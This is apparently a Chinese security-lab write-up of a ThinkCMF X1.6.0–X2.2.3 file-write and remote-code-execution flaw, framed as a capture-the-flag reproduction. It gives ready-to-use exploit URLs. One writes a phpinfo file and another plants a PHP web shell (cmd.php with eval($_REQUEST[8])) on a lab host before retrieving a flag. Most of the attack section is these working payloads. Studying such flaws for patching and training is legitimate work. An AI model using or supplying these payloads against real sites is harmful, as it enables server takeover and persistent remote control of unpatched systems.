漏洞描述:攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
影响版本:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
参考资料:
POC:
?a=fetch&templateFile=public/index&prefix="&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
------------------------
?a=display&templateFile=README.md
漏洞复现:
http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%22&content=%3Cphp%3Efile_put_contents(%27test.php%27,%27%3C?php%20phpinfo();?%3E%27)%3C/php%3E
![图片[1]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd231021-1024x594.png)
- 写马
- http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27cmd.php%27,%27%3C?php%20eval($_REQUEST[8]);%20?%3E%27)%3C/php%3E
![图片[2]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd231102-1024x580.png)
- 获取flag
![图片[3]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd231126-1024x337.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容